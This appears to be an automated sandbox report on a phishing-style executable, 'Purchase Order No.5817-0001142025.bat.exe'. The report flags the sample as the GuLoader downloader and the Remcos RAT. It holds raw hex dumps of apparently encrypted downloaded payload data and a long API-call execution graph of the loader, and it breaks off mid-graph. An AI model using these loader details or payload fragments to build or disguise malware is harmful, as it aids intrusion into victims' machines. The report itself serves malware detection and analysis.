                                                                    Last-Modified: Mon, 13 Jan 2025 20:36:39 GMT
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 493632
                                                                    Connection: close
                                                                    Content-Type: application/octet-stream
                                                                    2025-01-16 04:12:00 UTC7969INData Raw: 7c cd 41 88 f3 aa b9 07 43 9f e2 63 1a 47 c0 99 31 f6 fb dd 98 80 55 65 a7 3c 37 0d 1d c9 47 fe 3b 7b 83 83 8b 95 f6 6d 84 04 cf 6b 56 6c 14 ef e6 62 6a 1b 24 de 29 fd 65 9d da 35 73 99 e0 3b e3 64 d9 d6 0b 86 83 14 68 d8 e0 b2 71 08 bb eb 3f b2 62 d1 c7 75 5f 29 f3 08 48 8e 63 dd b2 49 43 5d 51 bf b9 8a 67 bc bc 96 79 ae f3 18 ed fb c1 77 64 3d 94 2f ed 87 5d 08 71 1e ac 12 a9 4f 7e f6 2b bc 12 74 fb 4f d2 b0 1b 55 d7 e6 5a 1b ee ab 6e 5a bf 78 48 59 e7 8c b6 10 26 c5 e7 f3 13 33 03 d8 c0 69 ac 98 f1 0c 97 0f 65 30 a8 48 cf 5a f1 85 13 86 2b 0e 4c 0b 2a f8 12 3d cd 6d d1 d5 8e 28 37 d4 0c 7a 57 8e 4f 0f 20 d0 03 36 e7 ef 39 b3 65 fb 8e eb 51 8b 00 6c e4 24 1e 3b e1 f0 e7 99 2f 1f 74 43 d5 8d 49 43 6a 86 fa 0d 53 43 da 6a 0d 59 35 99 86 b3 4c 7d 52 02 d1
                                                                    Data Ascii: |ACcG1Ue<7G;{mkVlbj$)e5s;dhq?bu_)HcIC]Qgywd=/]qO~+tOUZnZxHY&3ie0HZ+L*=m(7zWO 69eQl$;/tCICjSCjY5L}R
                                                                    2025-01-16 04:12:01 UTC8000INData Raw: 14 7f ba 45 09 92 32 0f ea 33 6d d8 1a 88 94 cd 80 d9 de 78 1c 70 47 04 b3 85 ac 5c c4 03 ff 34 19 85 30 5a 54 a9 fc 6f f4 f5 4e 6c ab c8 ed 80 c3 51 93 da 8f 94 b5 96 ef 0d 3c 87 f0 60 c8 d0 72 ed 77 b1 ba 93 a2 bd a9 e7 c4 16 88 34 03 a0 68 16 25 bd 91 6a 01 6b ce d5 68 fa 35 f0 34 47 02 c0 86 37 e3 db 86 a7 f6 1b ea 4c 22 e1 9c ec dc 2f 0b 5c db fe 86 9c a2 3f 12 ec 92 13 7c 9d 90 4a 66 cd 42 d6 99 ca 08 a1 bd 46 6d 96 6e 7b 1d 6e 6f 92 22 af 5d 14 fc 39 99 cd 0d 7a a1 3e db 3d 2d e6 9d a0 aa 53 e8 7f 27 06 79 35 41 35 6d b3 49 68 8c 71 17 2f 03 99 00 3a c3 94 18 70 b8 f2 d5 33 13 bd 41 77 71 f9 37 31 ac 06 9c 5b 65 1c 03 7b fd 5d aa 1b db 42 96 69 e1 81 f8 e2 75 ec 13 a3 cb 8a 04 1a 10 d8 55 03 e9 f8 eb 66 56 7b f5 da cd 49 08 03 4c d6 ff cc c6 31 ca
                                                                    Data Ascii: E23mxpG\40ZToNlQ<`rw4h%jkh54G7L"/\?|JfBFmn{no"]9z>=-S'y5A5mIhq/:p3Awq71[e{]BiuUfV{IL1
                                                                    2025-01-16 04:12:01 UTC8000INData Raw: 1d 99 73 43 23 e8 b2 91 f3 06 0d a9 1d 75 98 f2 f3 8c 70 3a 7b 6b ef b1 8a e6 f5 13 19 7c b8 59 2d 4e 0c 0d d7 06 be 96 e0 6c 06 51 10 83 80 75 2c a1 13 99 ef 74 59 fb 19 54 8c d2 c1 15 c5 93 b3 b2 85 88 d2 fc bf 72 e5 bb 88 20 3a e4 b7 d6 00 91 c5 d9 7d 6f 91 1a 7f dd 13 84 10 2a 40 be 17 88 53 a7 f7 a2 b6 0e 28 cd c9 e7 d6 df 0c 29 2d 01 49 e3 c1 eb 6d 4c 9d 70 41 c5 64 eb b1 45 23 fc 63 49 c9 84 44 9a 92 d0 0d 51 ed 19 11 e6 c2 80 89 4d f9 bb 50 c4 19 66 92 aa e8 e2 87 2b 1a 4b f7 92 6d 70 f3 5d 91 89 33 22 10 24 55 c3 70 f3 9a c5 b7 fd c1 a9 49 6b f8 d0 db bd d4 36 45 f6 5f db 79 8d ca aa 9c a4 27 9e 85 97 63 f9 8b 23 7a 00 8d fe 2d 22 33 e8 26 d1 9f 4b ec f4 ce 5b c8 a3 d1 64 3e 65 4e f7 7a 30 22 f8 20 fd e6 7e 33 85 54 c9 df 40 16 5e 1c 2a ec 15 64
                                                                    Data Ascii: sC#up:{k|Y-NlQu,tYTr :}o*@S()-ImLpAdE#cIDQMPf+Kmp]3"$UpIk6E_y'c#z-"3&K[d>eNz0" ~3T@^*d
                                                                    2025-01-16 04:12:01 UTC8000INData Raw: e3 20 b1 06 5b 94 71 65 e9 ba 28 b3 50 80 36 e6 26 4b b4 36 a0 ab 64 ff 63 32 8e d4 61 bc b7 dd 4f 9d 09 da 48 ea 83 1b 49 74 33 ad 32 6b 05 69 b1 61 8c 07 ba 74 57 ff 19 5d 5b f0 bc 27 06 89 42 d9 e2 88 b0 eb 05 36 57 d5 0e fe 56 b7 d3 86 2c ef 87 bc 5a 1b ac be 8b 44 1f ae 0d 28 7a fe de 66 1c 85 65 92 9b 86 a0 9c f9 7d 2b 42 b0 d8 f1 d8 30 bb d6 a8 98 05 5e 39 f4 e0 e5 25 7f d8 e4 c4 82 3a b5 64 81 35 78 85 d6 c6 d1 0b 74 4c 0b 26 6e 51 03 2a f0 f7 2b 8d 80 7f 0b 24 ff 65 7c 37 d9 7a c1 b0 4b 1c 69 4d 0f 92 3c c5 c7 71 f9 fe fa d5 5d b2 65 33 7c 50 74 61 78 51 6f db f3 5b 2d 1b 2e e5 13 67 71 c7 72 80 f6 c4 36 aa 40 dd d2 35 80 a9 ec fd dd e8 94 93 c3 32 bf 77 c3 e6 af df d7 e0 74 6f ef 9c d1 1c c7 8d 02 3b 6b 28 22 41 19 25 cb 6b aa e4 28 4e 27 64 a1
                                                                    Data Ascii: [qe(P6&K6dc2aOHIt32kiatW]['B6WV,ZD(zfe}+B0^9%:d5xtL&nQ*+$e|7zKiM<q]e3|PtaxQo[-.gqr6@52wto;k("A%k(N'd
                                                                    2025-01-16 04:12:01 UTC8000INData Raw: 7f 8d df 74 cd 00 10 39 15 3c 84 c7 84 9c 29 2b 11 22 45 b2 31 27 5f 50 be 5b 34 ef 2b dc be 71 9a e5 60 bf b3 2c 9b 42 9f 6c 58 03 a8 89 65 22 b0 b9 a3 f9 29 f7 93 6c bb 4d 57 b2 09 d6 9e 99 aa e4 ba e5 30 55 99 4e d8 84 28 7f d0 6d 53 c5 b5 18 e7 c7 67 fa 38 fb dd 6d 03 6d 18 ba fe 2b 42 14 24 60 9e 1e ed a2 c6 82 2d 21 22 0b e9 65 b3 30 55 0b 23 72 ed 23 ba f7 be c1 7c 4b 91 dd 2f 5c ec 66 cc 00 ee c2 22 48 70 5f e1 0b 7f 9b 1d f9 ba 1b a4 a2 f6 cc 26 9d 4e 04 fd 30 91 bc bc 20 d6 f7 e8 69 b1 a5 a3 2d d5 62 0c 7b d7 74 a9 b6 36 35 37 6f 15 7d e0 9e 3c 09 bd 6a 5c 16 15 1f e4 25 ee 4e 4c 39 62 06 3d 40 ac 9e 66 9a 75 bf b9 a4 9c a9 19 f1 9d 30 b8 69 a7 79 ae 14 f8 72 1b 49 a7 94 0e 3d a1 78 f6 75 ec 65 ae 79 4d 19 f3 6c c0 f2 b7 a8 2d 93 b4 c6 b8 f8 09
                                                                    Data Ascii: t9<)+"E1'_P[4+q`,BlXe")lMW0UN(mSg8mm+B$`-!"e0U#r#|K/\f"Hp_&N0 i-b{t657o}<j\%NL9b=@fu0iyrI=xueyMl-
                                                                    2025-01-16 04:12:01 UTC8000INData Raw: 56 98 2e 6e 4e b8 92 f3 84 a4 48 f2 82 26 98 03 e0 19 59 53 59 0e 60 85 86 7f b2 d6 f2 3b 40 28 65 7a b5 15 bf 06 d9 09 a2 8b 2d 09 68 ea cb 01 ed 5a 40 f2 4b 75 b2 da e7 a4 ec a3 35 46 65 ba df d9 75 0e 75 9f ae b3 04 3e e0 3c f5 eb 93 5b 0c aa 05 3b ec 03 ac c5 9d 2e 44 99 47 a2 7f 60 1c ea 25 dd 5a 55 34 a2 ae 57 fb 8a 66 bc 3f 52 49 68 b5 51 ed 7b bf 3d 64 48 84 ac d3 87 29 03 8e 28 5b 06 39 cc 35 e9 12 94 12 70 f3 69 f1 3a da 46 44 0e cd 26 0c 34 cd c6 8d 41 78 a6 c3 11 1d 8a 17 54 9c 40 e5 56 61 30 a5 13 63 ee bd 23 f9 47 a5 14 bd 68 f2 b8 d8 20 d5 b6 2e 04 68 52 a1 28 9f 70 15 85 09 7c c6 73 d6 cc 58 c0 e7 2e f5 8d 67 67 57 8c 33 d3 47 31 31 4c da 51 9d b7 64 ee 08 93 4a 81 e5 cc e7 14 76 a8 20 b0 21 d9 14 b4 d3 9e cb 38 74 a8 c4 c4 b8 a6 a1 92 e7
                                                                    Data Ascii: V.nNH&YSY`;@(ez-hZ@Ku5Feuu><[;.DG`%ZU4Wf?RIhQ{=dH)([95pi:FD&4AxT@Va0c#Gh .hR(p|sX.ggW3G11LQdJv !8t
                                                                    2025-01-16 04:12:01 UTC8000INData Raw: c5 05 3d 3b 77 e5 ab 9e 85 41 f4 35 46 ad 80 5c 27 0e c9 07 23 34 d6 b7 63 95 67 b7 b1 91 3f ef 7f ff cb 91 cc e4 9f dc 99 d7 c1 38 2f 5d 2a bc d0 a6 36 8c c2 53 d6 e4 fd 32 28 c6 b5 16 a9 a9 af af 84 b6 2b 70 3f 39 4b 99 c8 1a 72 f2 a7 7d c0 2e 7a 25 3a 7f 15 24 29 b5 7a cc 75 93 8b 16 07 bd 44 23 f9 55 ef 22 11 ca 38 32 a2 2a b7 9b 31 60 5d 3d c2 a1 e5 1d 1a 72 e6 8f 6b b6 17 e3 0c 31 da c2 ce e6 29 31 2f f6 39 40 be 92 f9 5d d6 27 a0 a4 47 45 ee b2 a4 b4 3c da 8e 6b 66 82 9e a1 4e f9 21 0a a5 83 01 9a ae 53 aa 21 88 99 c7 ad 98 ac 1a a8 3f cb 04 64 c9 ea 4a 2e 85 34 36 31 8e a8 c9 8d 17 dc ec 67 fd c5 03 e0 7b 1c dd 69 77 26 2c 62 16 be 68 03 32 b8 17 a7 14 ff 07 74 04 77 63 a0 30 ab 42 6f 33 6a 33 44 c8 b1 d6 c7 3c 84 a8 4f 83 03 ca 4d 57 24 58 92 6f
                                                                    Data Ascii: =;wA5F\'#4cg?8/]*6S2(+p?9Kr}.z%:$)zuD#U"82*1`]=rk1)1/9@]'GE<kfN!S!?dJ.461g{iw&,bh2twc0Bo3j3D<OMW$Xo
                                                                    2025-01-16 04:12:01 UTC8000INData Raw: e6 b7 0d 40 8b 1e d8 64 6c d9 a2 d6 72 bd 50 85 29 57 23 a8 f7 4d 56 51 67 ff 06 88 a0 83 5f 65 f0 f8 fa 19 6a fb f3 9b 97 b5 30 da e0 34 bc 86 43 62 50 0d 98 a4 49 5b e4 ac 8d 19 a9 79 5b d7 09 ec f8 3c 05 93 f3 33 1b 7f f3 4d 11 6d 44 c1 12 f1 00 a2 90 41 4d 0c 00 49 0b d7 d2 54 b6 d8 7e 71 83 65 e9 42 89 b6 8c 9c 5d 40 66 6c 12 8c 8d 8e 16 05 fb 7d 5e 9f 0b 78 32 92 17 d2 f5 44 0f b2 71 1f 1d 71 e1 85 2c 23 4e 49 f3 84 c6 28 da 50 62 49 97 8e 70 74 fd d8 09 df 66 6c 07 4a b4 80 fb af 92 85 9a 18 f7 df b0 81 fc f9 6a 4f 30 57 43 36 a6 ab 93 39 15 7a 89 87 76 e8 aa d4 76 0e 3b 96 3c c0 0b d9 14 94 a3 3b e0 e4 57 08 08 87 9a 35 bb ef 80 5c f5 53 6c d5 8b ed 80 cb 58 38 c2 4e 69 40 69 7a 80 8d 93 d5 a6 a9 c8 ef 33 34 b5 1a 3f 37 41 ad e6 1c bd f0 1f 79 73
                                                                    Data Ascii: @dlrP)W#MVQg_ej04CbPI[y[<3MmDAMIT~qeB]@fl}^x2Dqq,#NI(PbIptflJjO0WC69zvv;<;W5\SlX8Ni@iz34?7Ays
                                                                    2025-01-16 04:12:01 UTC8000INData Raw: f1 54 97 8d 24 06 d5 1c 60 45 f2 66 ee 49 f5 64 db 33 93 03 7c 25 b1 59 98 b4 3a 26 56 a6 3f 9a 3a f3 1e aa 4f 76 dc 87 e4 c3 ad a4 ac 05 aa 86 e2 cc a1 f0 20 3b a0 98 c5 02 25 21 8b ef 0b 50 d7 91 c9 a3 83 22 a9 02 f8 d5 97 17 85 0e 0b 0d 5b b9 d2 3c 9c c3 14 19 72 39 c9 6c 32 67 99 d7 91 5b f7 19 31 65 53 93 68 02 d2 b6 94 3a b2 be c1 9e 1a 72 0b d8 29 4d 2e 6a 6c 54 cf ac ba 5d 65 d6 fc 9d 9d 74 4a e4 c7 7f 57 29 f4 1f 13 1d 21 7c c0 f2 0b d0 0c 50 74 f1 73 e3 68 3b fa bf 33 bc 89 58 6f 66 fc 64 d7 f7 93 05 2e e3 99 8e 4a 3e 67 ac c4 b0 0b 40 dd a0 0d 80 91 8f 8a 2d 76 a3 e1 70 4f f7 60 c9 da 5c ab 46 56 c5 19 4b e8 bf 17 15 02 ca 24 b7 0b f3 ca 82 bf 7c 5d 51 1b ec 97 41 93 23 6d 3e ad 24 c7 89 6c 29 6f 14 88 4f ab 52 43 39 43 18 5f 0a 65 3a 54 9b 01
                                                                    Data Ascii: T$`EfId3|%Y:&V?:Ov ;%!P"[<r9l2g[1eSh:r)M.jlT]etJW)!|Ptsh;3Xofd.J>g@-vpO`\FVK$|]QA#m>$l)oORC9C_e:T
                                                                    2025-01-16 04:12:01 UTC8000INData Raw: bf e7 84 d7 32 13 db 41 22 ad 47 26 44 8c 21 ed 4a 2c 45 f5 71 bd 43 2d 7b 48 ee 56 66 a4 d5 90 28 1c 67 4f d9 97 f5 42 bc 53 91 8c c2 2f 4b a2 4e 56 7e fa ed 5a 96 e2 ae bc 7d f0 05 da 70 56 16 24 62 97 53 fe 59 81 59 89 28 52 bb 45 d7 f1 e1 e1 e3 86 37 c1 e5 ba 67 dc f5 f3 8f 43 64 ba 53 c3 82 7f 3c 48 a9 3c 8e c6 cf 91 ec 56 cc 2b df 1d 7b cf f4 5d ed 69 8a 92 90 17 0b 0b 32 2a 27 b1 d8 6d 12 5a d9 15 89 7f 83 d9 45 5a 5b 13 f6 dc 7a dc 68 3f 51 40 b5 42 4e 8c 5e 55 74 a6 75 99 ac 9f 86 f8 e8 01 e2 5b a1 94 97 df 3f 01 8a 32 53 5f ad 32 3d 88 de 65 c5 ea ff 6b 4b e2 a4 dc 2f f9 f0 6b 23 a3 a3 b7 58 65 98 8e 2a 09 b6 89 cf 20 6b 2a 28 67 ca be 5d 35 c4 71 cc 55 15 72 f3 ea 11 e1 c0 ef 91 a8 46 11 b0 17 b8 84 9c 5b 7f 96 50 8e 2e 4a 74 a1 81 98 67 be 56
                                                                    Data Ascii: 2A"G&D!J,EqC-{HVf(gOBS/KNV~Z}pV$bSYY(RE7gCdS<H<V+{]i2*'mZEZ[zh?Q@BN^Utu[?2S_2=ekK/k#Xe* k*(g]5qUrF[P.JtgV


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:23:10:04
                                                                    Start date:15/01/2025
                                                                    Path:C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"
                                                                    Imagebase:0x400000
                                                                    File size:617'221 bytes
                                                                    MD5 hash:FB2BE2965FB21D400341518012AD4867
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3095281637.00000000030B6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:23:11:46
                                                                    Start date:15/01/2025
                                                                    Path:C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"
                                                                    Imagebase:0x400000
                                                                    File size:617'221 bytes
                                                                    MD5 hash:FB2BE2965FB21D400341518012AD4867
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3324734721.0000000006502000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3324633416.00000000064D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:15.7%
                                                                      Dynamic/Decrypted Code Coverage:13.4%
                                                                      Signature Coverage:15.8%
                                                                      Total number of Nodes:1613
                                                                      Total number of Limit Nodes:33
                                                                      execution_graph 5197 4047c0 5198 4047d8 5197->5198 5202 4048f2 5197->5202 5228 404601 5198->5228 5199 40495c 5200 404a26 5199->5200 5201 404966 GetDlgItem 5199->5201 5240 404668 5200->5240 5204 404980 5201->5204 5205 4049e7 5201->5205 5202->5199 5202->5200 5206 40492d GetDlgItem SendMessageW 5202->5206 5204->5205 5212 4049a6 SendMessageW LoadCursorW SetCursor 5204->5212 5205->5200 5213 4049f9 5205->5213 5233 404623 EnableWindow 5206->5233 5207 40483f 5210 404601 22 API calls 5207->5210 5217 40484c CheckDlgButton 5210->5217 5211 404a21 5237 404a6f 5212->5237 5214 404a0f 5213->5214 5215 4049ff SendMessageW 5213->5215 5214->5211 5219 404a15 SendMessageW 5214->5219 5215->5214 5216 404957 5234 404a4b 5216->5234 5231 404623 EnableWindow 5217->5231 5219->5211 5223 40486a GetDlgItem 5232 404636 SendMessageW 5223->5232 5225 404880 SendMessageW 5226 4048a6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5225->5226 5227 40489d GetSysColor 5225->5227 5226->5211 5227->5226 5229 4066bf 21 API calls 5228->5229 5230 40460c SetDlgItemTextW 5229->5230 5230->5207 5231->5223 5232->5225 5233->5216 5235 404a59 5234->5235 5236 404a5e SendMessageW 5234->5236 5235->5236 5236->5199 5254 405ca8 ShellExecuteExW 5237->5254 5239 4049d5 LoadCursorW SetCursor 5239->5205 5241 40472b 5240->5241 5242 404680 GetWindowLongW 5240->5242 5241->5211 5242->5241 5243 404695 5242->5243 5243->5241 5244 4046c2 GetSysColor 5243->5244 5245 4046c5 5243->5245 5244->5245 5246 4046d5 SetBkMode 5245->5246 5247 4046cb SetTextColor 5245->5247 5248 4046f3 5246->5248 5249 4046ed GetSysColor 5246->5249 5247->5246 5250 404704 5248->5250 5251 4046fa SetBkColor 5248->5251 5249->5248 5250->5241 5252 404717 DeleteObject 5250->5252 5253 40471e CreateBrushIndirect 5250->5253 5251->5250 5252->5253 5253->5241 5254->5239 5255 402643 5256 402672 5255->5256 5257 402657 5255->5257 5259 4026a2 5256->5259 5260 402677 5256->5260 5258 402d89 21 API calls 5257->5258 5268 40265e 5258->5268 5262 402dab 21 API calls 5259->5262 5261 402dab 21 API calls 5260->5261 5264 40267e 5261->5264 5263 4026a9 lstrlenW 5262->5263 5263->5268 5272 4066a4 WideCharToMultiByte 5264->5272 5266 402692 lstrlenA 5266->5268 5267 4026ec 5268->5267 5270 406253 5 API calls 5268->5270 5271 4026d6 5268->5271 5269 406224 WriteFile 5269->5267 5270->5271 5271->5267 5271->5269 5272->5266 4325 403645 SetErrorMode GetVersionExW 4326 4036d1 4325->4326 4327 403699 GetVersionExW 4325->4327 4328 403728 4326->4328 4329 406a76 5 API calls 4326->4329 4327->4326 4330 406a06 3 API calls 4328->4330 4329->4328 4331 40373e lstrlenA 4330->4331 4331->4328 4332 40374e 4331->4332 4333 406a76 5 API calls 4332->4333 4334 403755 4333->4334 4335 406a76 5 API calls 4334->4335 4336 40375c 4335->4336 4337 406a76 5 API calls 4336->4337 4338 403768 #17 OleInitialize SHGetFileInfoW 4337->4338 4413 406682 lstrcpynW 4338->4413 4341 4037b7 GetCommandLineW 4414 406682 lstrcpynW 4341->4414 4343 4037c9 4344 405f7e CharNextW 4343->4344 4345 4037ef CharNextW 4344->4345 4355 403801 4345->4355 4346 403903 4347 403917 GetTempPathW 4346->4347 4415 403614 4347->4415 4349 40392f 4351 403933 GetWindowsDirectoryW lstrcatW 4349->4351 4352 403989 DeleteFileW 4349->4352 4350 405f7e CharNextW 4350->4355 4353 403614 12 API calls 4351->4353 4425 4030d5 GetTickCount GetModuleFileNameW 4352->4425 4356 40394f 4353->4356 4355->4346 4355->4350 4359 403905 4355->4359 4356->4352 4358 403953 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4356->4358 4357 40399d 4365 405f7e CharNextW 4357->4365 4396 403a44 4357->4396 4404 403a54 4357->4404 4360 403614 12 API calls 4358->4360 4512 406682 lstrcpynW 4359->4512 4363 403981 4360->4363 4363->4352 4363->4404 4369 4039bc 4365->4369 4367 403ba2 4598 405ce2 4367->4598 4368 403bc6 4371 403c4a ExitProcess 4368->4371 4372 403bce GetCurrentProcess OpenProcessToken 4368->4372 4373 403a1a 4369->4373 4374 403a5d 4369->4374 4377 403be6 LookupPrivilegeValueW AdjustTokenPrivileges 4372->4377 4378 403c1a 4372->4378 4513 406059 4373->4513 4529 405c4d 4374->4529 4377->4378 4379 406a76 5 API calls 4378->4379 4382 403c21 4379->4382 4386 403c36 ExitWindowsEx 4382->4386 4388 403c43 4382->4388 4386->4371 4386->4388 4387 403a7c 4390 403a94 4387->4390 4533 406682 lstrcpynW 4387->4533 4602 40140b 4388->4602 4395 403aba wsprintfW 4390->4395 4410 403ae6 4390->4410 4392 403a39 4528 406682 lstrcpynW 4392->4528 4397 4066bf 21 API calls 4395->4397 4455 403d54 4396->4455 4397->4390 4400 403b30 SetCurrentDirectoryW 4579 406442 MoveFileExW 4400->4579 4401 403af6 GetFileAttributesW 4402 403b02 DeleteFileW 4401->4402 4401->4410 4402->4410 4589 403c62 4404->4589 4407 406442 40 API calls 4407->4410 4408 4066bf 21 API calls 4408->4410 4410->4390 4410->4395 4410->4400 4410->4401 4410->4404 4410->4407 4410->4408 4411 403bb8 CloseHandle 4410->4411 4534 405bd6 CreateDirectoryW 4410->4534 4537 405c30 CreateDirectoryW 4410->4537 4540 405d8e 4410->4540 4583 405c65 CreateProcessW 4410->4583 4586 4069df FindFirstFileW 4410->4586 4411->4404 4413->4341 4414->4343 4416 406930 5 API calls 4415->4416 4418 403620 4416->4418 4417 40362a 4417->4349 4418->4417 4605 405f51 lstrlenW CharPrevW 4418->4605 4421 405c30 2 API calls 4422 403638 4421->4422 4423 4061a1 2 API calls 4422->4423 4424 403643 4423->4424 4424->4349 4608 406172 GetFileAttributesW CreateFileW 4425->4608 4427 403118 4454 403125 4427->4454 4609 406682 lstrcpynW 4427->4609 4429 40313b 4610 405f9d lstrlenW 4429->4610 4433 40314c GetFileSize 4434 403163 4433->4434 4449 403246 4433->4449 4440 4032e3 4434->4440 4447 403033 36 API calls 4434->4447 4434->4449 4434->4454 4646 4035e7 4434->4646 4438 40328b GlobalAlloc 4443 4032a2 4438->4443 4441 403033 36 API calls 4440->4441 4441->4454 4442 40326c 4444 4035e7 ReadFile 4442->4444 4445 4061a1 2 API calls 4443->4445 4446 403277 4444->4446 4448 4032b3 CreateFileW 4445->4448 4446->4438 4446->4454 4447->4434 4450 4032ed 4448->4450 4448->4454 4615 403033 4449->4615 4630 4035fd SetFilePointer 4450->4630 4452 4032fb 4631 403376 4452->4631 4454->4357 4456 406a76 5 API calls 4455->4456 4457 403d68 4456->4457 4458 403d80 4457->4458 4459 403d6e 4457->4459 4460 406550 3 API calls 4458->4460 4701 4065c9 wsprintfW 4459->4701 4461 403db0 4460->4461 4463 403dcf lstrcatW 4461->4463 4465 406550 3 API calls 4461->4465 4464 403d7e 4463->4464 4693 40402a 4464->4693 4465->4463 4468 406059 18 API calls 4470 403e01 4468->4470 4469 403e95 4471 406059 18 API calls 4469->4471 4470->4469 4472 406550 3 API calls 4470->4472 4473 403e9b 4471->4473 4474 403e33 4472->4474 4475 403eab LoadImageW 4473->4475 4476 4066bf 21 API calls 4473->4476 4474->4469 4479 403e54 lstrlenW 4474->4479 4482 405f7e CharNextW 4474->4482 4477 403f51 4475->4477 4478 403ed2 RegisterClassW 4475->4478 4476->4475 4481 40140b 2 API calls 4477->4481 4480 403f08 SystemParametersInfoW CreateWindowExW 4478->4480 4510 403f5b 4478->4510 4483 403e62 lstrcmpiW 4479->4483 4484 403e88 4479->4484 4480->4477 4485 403f57 4481->4485 4486 403e51 4482->4486 4483->4484 4487 403e72 GetFileAttributesW 4483->4487 4488 405f51 3 API calls 4484->4488 4490 40402a 22 API calls 4485->4490 4485->4510 4486->4479 4489 403e7e 4487->4489 4491 403e8e 4488->4491 4489->4484 4493 405f9d 2 API calls 4489->4493 4494 403f68 4490->4494 4702 406682 lstrcpynW 4491->4702 4493->4484 4495 403f74 ShowWindow 4494->4495 4496 403ff7 4494->4496 4497 406a06 3 API calls 4495->4497 4703 4057da OleInitialize 4496->4703 4499 403f8c 4497->4499 4501 403f9a GetClassInfoW 4499->4501 4504 406a06 3 API calls 4499->4504 4500 403ffd 4502 404001 4500->4502 4503 404019 4500->4503 4506 403fc4 DialogBoxParamW 4501->4506 4507 403fae GetClassInfoW RegisterClassW 4501->4507 4508 40140b 2 API calls 4502->4508 4502->4510 4505 40140b 2 API calls 4503->4505 4504->4501 4505->4510 4509 40140b 2 API calls 4506->4509 4507->4506 4508->4510 4511 403fec 4509->4511 4510->4404 4511->4510 4512->4347 4721 406682 lstrcpynW 4513->4721 4515 40606a 4722 405ffc CharNextW CharNextW 4515->4722 4518 403a26 4518->4404 4527 406682 lstrcpynW 4518->4527 4519 406930 5 API calls 4525 406080 4519->4525 4520 4060b1 lstrlenW 4521 4060bc 4520->4521 4520->4525 4522 405f51 3 API calls 4521->4522 4524 4060c1 GetFileAttributesW 4522->4524 4523 4069df 2 API calls 4523->4525 4524->4518 4525->4518 4525->4520 4525->4523 4526 405f9d 2 API calls 4525->4526 4526->4520 4527->4392 4528->4396 4530 406a76 5 API calls 4529->4530 4531 403a62 lstrlenW 4530->4531 4532 406682 lstrcpynW 4531->4532 4532->4387 4533->4390 4535 405c22 4534->4535 4536 405c26 GetLastError 4534->4536 4535->4410 4536->4535 4538 405c40 4537->4538 4539 405c44 GetLastError 4537->4539 4538->4410 4539->4538 4541 406059 18 API calls 4540->4541 4542 405dae 4541->4542 4543 405db6 DeleteFileW 4542->4543 4544 405dcd 4542->4544 4545 405f04 4543->4545 4546 405ef8 4544->4546 4728 406682 lstrcpynW 4544->4728 4545->4410 4546->4545 4552 4069df 2 API calls 4546->4552 4548 405df3 4549 405e06 4548->4549 4550 405df9 lstrcatW 4548->4550 4551 405f9d 2 API calls 4549->4551 4553 405e0c 4550->4553 4551->4553 4555 405f12 4552->4555 4554 405e1c lstrcatW 4553->4554 4556 405e27 lstrlenW FindFirstFileW 4553->4556 4554->4556 4555->4545 4557 405f16 4555->4557 4558 405eed 4556->4558 4577 405e49 4556->4577 4559 405f51 3 API calls 4557->4559 4558->4546 4560 405f1c 4559->4560 4561 405d46 5 API calls 4560->4561 4564 405f28 4561->4564 4563 405ed0 FindNextFileW 4565 405ee6 FindClose 4563->4565 4563->4577 4566 405f42 4564->4566 4567 405f2c 4564->4567 4565->4558 4569 405707 28 API calls 4566->4569 4567->4545 4570 405707 28 API calls 4567->4570 4569->4545 4572 405f39 4570->4572 4571 405d8e 64 API calls 4571->4577 4574 406442 40 API calls 4572->4574 4573 405707 28 API calls 4573->4563 4575 405f40 4574->4575 4575->4545 4576 405707 28 API calls 4576->4577 4577->4563 4577->4571 4577->4573 4577->4576 4578 406442 40 API calls 4577->4578 4729 406682 lstrcpynW 4577->4729 4730 405d46 4577->4730 4578->4577 4580 403b3f CopyFileW 4579->4580 4581 406456 4579->4581 4580->4404 4580->4410 4741 4062c8 4581->4741 4584 405ca4 4583->4584 4585 405c98 CloseHandle 4583->4585 4584->4410 4585->4584 4587 406a00 4586->4587 4588 4069f5 FindClose 4586->4588 4587->4410 4588->4587 4590 403c73 CloseHandle 4589->4590 4591 403c7d 4589->4591 4590->4591 4592 403c91 4591->4592 4593 403c87 CloseHandle 4591->4593 4775 403cbf 4592->4775 4593->4592 4596 405d8e 71 API calls 4597 403b95 OleUninitialize 4596->4597 4597->4367 4597->4368 4600 405cf7 4598->4600 4599 403bb0 ExitProcess 4600->4599 4601 405d0b MessageBoxIndirectW 4600->4601 4601->4599 4603 401389 2 API calls 4602->4603 4604 401420 4603->4604 4604->4371 4606 403632 4605->4606 4607 405f6d lstrcatW 4605->4607 4606->4421 4607->4606 4608->4427 4609->4429 4611 405fab 4610->4611 4612 405fb1 CharPrevW 4611->4612 4613 403141 4611->4613 4612->4611 4612->4613 4614 406682 lstrcpynW 4613->4614 4614->4433 4616 403044 4615->4616 4617 40305c 4615->4617 4618 403054 4616->4618 4619 40304d DestroyWindow 4616->4619 4620 403064 4617->4620 4621 40306c GetTickCount 4617->4621 4618->4438 4618->4454 4649 